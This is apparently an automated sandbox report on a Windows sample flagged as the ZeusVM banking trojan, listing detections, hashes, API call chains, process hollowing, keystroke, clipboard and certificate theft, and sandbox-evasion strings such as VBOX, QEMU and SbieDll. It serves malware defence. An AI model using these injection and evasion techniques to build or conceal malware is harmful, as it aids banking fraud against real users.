Play interactive tour

Edit tour

Windows Analysis Report yw6At7QnNh

Overview

General Information

Sample Name:	yw6At7QnNh (renamed file extension from none to exe)
Analysis ID:	458121
MD5:	8ba293749c97cbf48f30f02c66d3406d
SHA1:	6a7492a26d0a16320daa2cb187232fc0053f4f5f
SHA256:	e2075b32b9716dc41ef667a74c1ae2c2841a5b9fd3046db0bdcd96c581778253
Tags:	exeuncategorized
Infos:
Most interesting Screenshot:

Detection

ZeusVM

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected ZeusVM e-Banking Trojan

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Contain functionality to detect virtual machines

Contains VNC / remote desktop functionality (version string found)

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

May initialize a security null descriptor

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

yw6At7QnNh.exe (PID: 3420 cmdline: 'C:\Users\user\Desktop\yw6At7QnNh.exe' MD5: 8BA293749C97CBF48F30F02C66D3406D)

yw6At7QnNh.exe (PID: 5952 cmdline: 'C:\Users\user\Desktop\yw6At7QnNh.exe' MD5: 8BA293749C97CBF48F30F02C66D3406D)

yw6At7QnNh.exe (PID: 1536 cmdline: 'C:\Users\user\Desktop\yw6At7QnNh.exe' MD5: 8BA293749C97CBF48F30F02C66D3406D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: yw6At7QnNh.exe

Avira: detected

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\ athefff3h6266cd5fa708f.tmp

Avira: detection malicious, Label: TR/Agent.hjvc

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\ athefff3h6266cd5fa708f.tmp

ReversingLabs: Detection: 53%

Multi AV Scanner detection for submitted file

Show sources

Source: yw6At7QnNh.exe	Virustotal: Detection: 81%	Perma Link
Source: yw6At7QnNh.exe	Metadefender: Detection: 60%	Perma Link
Source: yw6At7QnNh.exe	ReversingLabs: Detection: 92%

Machine Learning detection for sample

Show sources

Source: yw6At7QnNh.exe

Joe Sandbox ML: detected

Source: 1.2.yw6At7QnNh.exe.10000000.4.unpack	Avira: Label: TR/Agent.hjvc
Source: 3.2.yw6At7QnNh.exe.400000.0.unpack	Avira: Label: TR/Kazy.MK
Source: 3.1.yw6At7QnNh.exe.400000.0.unpack	Avira: Label: TR/Kazy.MK
Source: 1.2.yw6At7QnNh.exe.400000.0.unpack	Avira: Label: TR/Agent.hjvc

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 2_2_00401282 GetModuleFileNameA,GetEnvironmentVariableA,GetEnvironmentVariableA,GetEnvironmentVariableA,FindResourceA,GetDesktopWindow,GetDesktopWindow,PeekMessageA,Sleep,IsWindow,IsDialogMessageA,TranslateMessage,DispatchMessageA,IsDlgButtonChecked,GetDesktopWindow,FindResourceA,LoadResource,SizeofResource,LockResource,FindResourceA,LoadResource,SizeofResource,??2@YAPAXI@Z,??_U@YAPAXI@Z,LockResource,PathCombineA,PathFileExistsA,CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptCreateHash,??2@YAPAXI@Z,??_U@YAPAXI@Z,??2@YAPAXI@Z,CryptHashData,CryptDeriveKey,CryptDecrypt,MessageBoxA,??2@YAPAXI@Z,Sleep,GetCommandLineA,CreateFileA,FindCloseChangeNotification,PathCombineA,CreateFileA,CloseHandle,FindExecutableA,DeleteFileA,DeleteFileA,DeleteFileA,Sleep,PathCombineA,DeleteFileA,	2_2_00401282
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_0040D467 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	3_2_0040D467
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_00417C71 CryptUnprotectData,LocalFree,	3_2_00417C71
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_0040D467 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	3_1_0040D467
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_00417C71 CryptUnprotectData,LocalFree,	3_1_00417C71

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Unpacked PE file: 2.2.yw6At7QnNh.exe.400000.0.unpack
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Unpacked PE file: 3.2.yw6At7QnNh.exe.400000.0.unpack

Source: yw6At7QnNh.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_0040B8C3 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,		3_2_0040B8C3
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_0040B8C3 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,		3_1_0040B8C3

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_00411830 PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,	3_2_00411830
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_004118EB FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	3_2_004118EB
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_00411830 PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,	3_1_00411830
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_004118EB FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	3_1_004118EB

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 3_2_00414047 recv,

3_2_00414047

Source: yw6At7QnNh.exe	String found in binary or memory: http://www.google.com/webhp
Source: yw6At7QnNh.exe, 00000002.00000002.205524903.0000000002070000.00000004.00000001.sdmp, yw6At7QnNh.exe, 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://www.google.com/webhpbcMY.txt

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 3_2_0041D43B GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,TranslateMessage,GetClipboardData,PFXImportCertStore,

3_2_0041D43B

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 3_2_00409FCC EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,

3_2_00409FCC

E-Banking Fraud:

Detected ZeusVM e-Banking Trojan

Show sources

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_0041ADE1 lstrcmpiA,lstrcmpiA,lstrcmpiA,CloseHandle,		3_2_0041ADE1
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_0041ADE1 lstrcmpiA,lstrcmpiA,lstrcmpiA,TlsSetValue,CloseHandle,		3_1_0041ADE1

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 3_2_0040A2BA OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation,

3_2_0040A2BA

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 1_2_10001000 peagtfosapeh,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,	1_2_10001000
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 2_2_00401046 DeleteFileA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,	2_2_00401046
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 2_1_00401046 CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,	2_1_00401046

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 2_2_004018F0: GetModuleHandleA,??2@YAPAXI@Z,lstrcatA,CreateFileA,DeviceIoControl,isalnum,isalnum,lstrcpyA,lstrcpyA,lstrcpyA,CharUpperA,CharUpperA,CharUpperA,CloseHandle,

2_2_004018F0

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 3_2_0040DAE4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

3_2_0040DAE4

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_00416142 InitiateSystemShutdownExW,ExitWindowsEx,	3_2_00416142
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_00413970 CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	3_2_00413970
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_00416142 InitiateSystemShutdownExW,ExitWindowsEx,	3_1_00416142
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_00413970 CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	3_1_00413970

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 1_2_004036E4	1_2_004036E4
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_0040200B	3_2_0040200B
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_0040718A	3_2_0040718A
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_0040D373	3_2_0040D373
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_0040EF15	3_2_0040EF15
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_0040200B	3_1_0040200B
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_0040718A	3_1_0040718A
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_0040D373	3_1_0040D373
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_0040EF15	3_1_0040EF15

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: String function: 00408888 appears 37 times

Source: yw6At7QnNh.exe, 00000001.00000002.203455259.00000000027D0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs yw6At7QnNh.exe
Source: yw6At7QnNh.exe, 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameTStub.exe vs yw6At7QnNh.exe
Source: yw6At7QnNh.exe, 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameCwork.exe vs yw6At7QnNh.exe
Source: yw6At7QnNh.exe	Binary or memory string: OriginalFilename vs yw6At7QnNh.exe
Source: yw6At7QnNh.exe, 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameCwork.exe vs yw6At7QnNh.exe
Source: yw6At7QnNh.exe	Binary or memory string: OriginalFilenameTStub.exe vs yw6At7QnNh.exe

Source: yw6At7QnNh.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: athefff3h6266cd5fa708f.tmp.1.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.bank.troj.evad.winEXE@5/2@0/0

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 1_2_0040105A GetSysColor,GetDoubleClickTime,SetDoubleClickTime,GetTickCount,GetDesktopWindow,GetDesktopWindow,PeekMessageA,PeekMessageA,Sleep,IsWindow,IsDialogMessageA,TranslateMessage,DispatchMessageA,IsDlgButtonChecked,GetDesktopWindow,FindWindowA,SetWindowTextA,LoadLibraryA,GetProcAddress,FindResourceA,IsClipboardFormatAvailable,wsprintfA,LoadResource,SizeofResource,GetLastError,GetCurrentProcess,TerminateProcess,LockResource,GetOpenFileNameA,SetFileAttributesA,LdrInitializeThunk,lstrcmpiA,MessageBoxA,GetClassInfoW,GetSysColor,GetTempPathA,GetUserDefaultLangID,PathAddBackslashA,lstrcatA,CreateFileA,WriteFile,GetLastError,FormatMessageA,CloseHandle,IsWindowEnabled,PostMessageA,LoadLibraryA,lstrlenA,GetProcAddress,GetCurrentThreadId,peagtfosapeh,

1_2_0040105A

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_004099A9 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	3_2_004099A9
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_00409B1E CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	3_2_00409B1E
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_004099A9 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	3_1_004099A9
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_00409B1E CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	3_1_00409B1E

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_0040D88E GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		3_2_0040D88E
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_0040D88E GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		3_1_0040D88E

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 3_2_0040D837 CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,

3_2_0040D837

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 3_2_004179CD CoCreateInstance,

3_2_004179CD

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

1_2_0040105A

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

File created: C:\Users\user\AppData\Local\Temp\ athefff3h6266cd5fa708f.tmp

Jump to behavior

Source: yw6At7QnNh.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: yw6At7QnNh.exe	Virustotal: Detection: 81%
Source: yw6At7QnNh.exe	Metadefender: Detection: 60%
Source: yw6At7QnNh.exe	ReversingLabs: Detection: 92%

Source: unknown	Process created: C:\Users\user\Desktop\yw6At7QnNh.exe 'C:\Users\user\Desktop\yw6At7QnNh.exe'
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Process created: C:\Users\user\Desktop\yw6At7QnNh.exe 'C:\Users\user\Desktop\yw6At7QnNh.exe'
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Process created: C:\Users\user\Desktop\yw6At7QnNh.exe 'C:\Users\user\Desktop\yw6At7QnNh.exe'
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Process created: C:\Users\user\Desktop\yw6At7QnNh.exe 'C:\Users\user\Desktop\yw6At7QnNh.exe'	Jump to behavior
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Process created: C:\Users\user\Desktop\yw6At7QnNh.exe 'C:\Users\user\Desktop\yw6At7QnNh.exe'	Jump to behavior

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Unpacked PE file: 3.2.yw6At7QnNh.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Unpacked PE file: 2.2.yw6At7QnNh.exe.400000.0.unpack
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Unpacked PE file: 3.2.yw6At7QnNh.exe.400000.0.unpack

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

1_2_0040105A

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 1_2_00405450 push eax; ret	1_2_0040547E
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 1_2_00408888 push eax; ret	1_2_004088A6
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 2_2_00402550 push eax; ret	2_2_0040257E
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 2_1_00402550 push eax; ret	2_1_0040257E
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_00402961 push cs; iretd	3_2_00402970
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_0040292B push cs; ret	3_2_00402940
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_0040B1F7 push ebp; ret	3_2_0040B386
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_00402295 push es; iretd	3_2_004022A4
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_00402961 push cs; iretd	3_1_00402970
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_0040292B push cs; ret	3_1_00402940
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_0040B1F7 push ebp; ret	3_1_0040B386
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_00402295 push es; iretd	3_1_004022A4

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

File created: C:\Users\user\AppData\Local\Temp\ athefff3h6266cd5fa708f.tmp

Jump to dropped file

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 3_2_0040BC07 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,

3_2_0040BC07

Malware Analysis System Evasion:

Contain functionality to detect virtual machines

Show sources

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: VBOX VBOX QEMU HARDDISK QEMU HARDDISK VMWARE VBOX

2_2_004018F0

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: yw6At7QnNh.exe	Binary or memory string: SBIEDLL.DLL
Source: yw6At7QnNh.exe, 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp, yw6At7QnNh.exe, 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp	Binary or memory string: $@RTLDECOMPRESSBUFFERNTDLL.DLLGETTHREADCONTEXTWRITEPROCESSMEMORYVIRTUALALLOCEXNTDLL.DLLNTUNMAPVIEWOFSECTIONCREATEPROCESSARESUMETHREADSETTHREADCONTEXTKERNEL32.DLLOPENMSDEFAULTBROWSER.HTMLYGN3456789MICROSOFT BASE CRYPTOGRAPHIC PROVIDER V1.0APPDATATEMPVIRTUALVMWAREQEMU HARDDISKVMLOGVBOX\\.\CWMONITORSBIEDLL.DLL

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_00411830 PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,	3_2_00411830
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_004118EB FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	3_2_004118EB
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_00411830 PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,	3_1_00411830
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_004118EB FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	3_1_004118EB

Source: yw6At7QnNh.exe, 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp	Binary or memory string: $@RtlDecompressBufferNtdll.dllGetThreadContextWriteProcessMemoryVirtualAllocExntdll.dllNtUnmapViewOfSectionCreateProcessAResumeThreadSetThreadContextkernel32.dllopenMSDefaultBrowser.htmlYGN3456789Microsoft Base Cryptographic Provider v1.0APPDATATEMPVIRTUALVMWAREQEMU HARDDISKVMLOGVBOX\\.\cwmonitorSbieDll.dll
Source: yw6At7QnNh.exe, 00000001.00000002.203455259.00000000027D0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: yw6At7QnNh.exe	Binary or memory string: QEMU HARDDISK
Source: yw6At7QnNh.exe	Binary or memory string: VMWARE
Source: yw6At7QnNh.exe, 00000001.00000002.203455259.00000000027D0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: yw6At7QnNh.exe, 00000001.00000002.203455259.00000000027D0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: yw6At7QnNh.exe, 00000001.00000002.203455259.00000000027D0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

1_2_0040105A

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

1_2_0040105A

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_004129EB mov edx, dword ptr fs:[00000030h]		3_2_004129EB
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_1_004129EB mov edx, dword ptr fs:[00000030h]		3_1_004129EB

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 3_2_00412D30 GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetLengthSid,GetCurrentProcessId,

3_2_00412D30

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 1_2_0040A813 SetUnhandledExceptionFilter,		1_2_0040A813
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 1_2_0040A825 SetUnhandledExceptionFilter,		1_2_0040A825

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 1_2_10001000 peagtfosapeh,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,

1_2_10001000

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Memory written: C:\Users\user\Desktop\yw6At7QnNh.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Memory written: C:\Users\user\Desktop\yw6At7QnNh.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Process created: C:\Users\user\Desktop\yw6At7QnNh.exe 'C:\Users\user\Desktop\yw6At7QnNh.exe'			Jump to behavior
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Process created: C:\Users\user\Desktop\yw6At7QnNh.exe 'C:\Users\user\Desktop\yw6At7QnNh.exe'			Jump to behavior

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 3_2_0040F7B1 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,

3_2_0040F7B1

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 1_2_00401B0C GetLocalTime,GetSystemTime,GetTimeZoneInformation,

1_2_00401B0C

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 3_2_0040994D GetUserNameExW,

3_2_0040994D

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 1_2_00403D2A GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

1_2_00403D2A

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Code function: 1_2_00401C01 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,KiUserExceptionDispatcher,

1_2_00401C01

Source: C:\Users\user\Desktop\yw6At7QnNh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: yw6At7QnNh.exe, 00000002.00000002.205524903.0000000002070000.00000004.00000001.sdmp

Binary or memory string: S:(ML;;NRNWNX;;;LW)SeSecurityPrivilegeS:(ML;CIOI;NRNWNX;;;LW)?O?I?Tcabcabinet.dllFCICreateFCIAddFileFCIFlushCabinetFCIDestroybcdfghklmnpqrstvwxzaeiouyGlobal\Local\

Remote Access Functionality:

